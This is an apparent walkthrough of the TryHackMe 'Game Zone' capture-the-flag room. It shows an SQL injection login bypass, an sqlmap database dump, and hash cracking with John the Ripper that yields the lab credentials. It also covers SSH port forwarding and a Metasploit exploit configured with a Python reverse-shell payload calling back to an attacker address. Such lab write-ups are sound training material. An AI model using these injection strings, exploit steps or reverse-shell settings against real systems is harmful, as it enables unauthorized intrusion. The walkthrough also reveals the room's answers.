Game Zone

Room Link: https://tryhackme.com/room/gamezone

Obtain access via SQLi

Username field was vulnerable to SQLi,

Username: ' or 1=1 -- -
Password: anything

Using SQLMap

I setup burp to intercept requests and then tried searching for something on the portal page

Saved the request into a file called request.txt, if you highlight everything and right click you can copy to file

sqlmap -r request.txt --dbms=mysql --dump

In the users table, what is the hashed password?

ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

What was the username associated with the hashed password?

agent47

What was the other table name?

post

Cracking a password with JohnTheRipper

Used the following site to idenfitfy what the hash type was. It identified that it is SHA2-256.

Hash Analyzer: https://www.tunnelsup.com/hash-analyzer/

What is the de-hashed password?

john was able to crack the hash ehich gave us the password videogamer124.

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-SHA256

ssh agent47@10.10.74.145
Password: videogamer124

Now you have a password and username. Try SSH'ing onto the machine. What is the user flag?

Exposing services with reverse SSH tunnels

How many TCP sockets are running?

ss -tulpn

What is the name of the exposed CMS?

ssh -L 10000:localhost:10000 agent47@10.10.74.145
Password: videogamer124

What is the CMS version?

I was able to login with the previous credentials found and find the CMS version.

Username: agent47
Password: videogamer124

Privilege Escalation with Metasploit

msfconsole
search 1.580
use 1
set USERNAME agent47
set PASSWORD videogamer124
set RHOSTS 127.0.0.1
set ssl false 

set payload cmd/unix/reverse_python
set lhost 10.10.108.150
set lport 443
exploit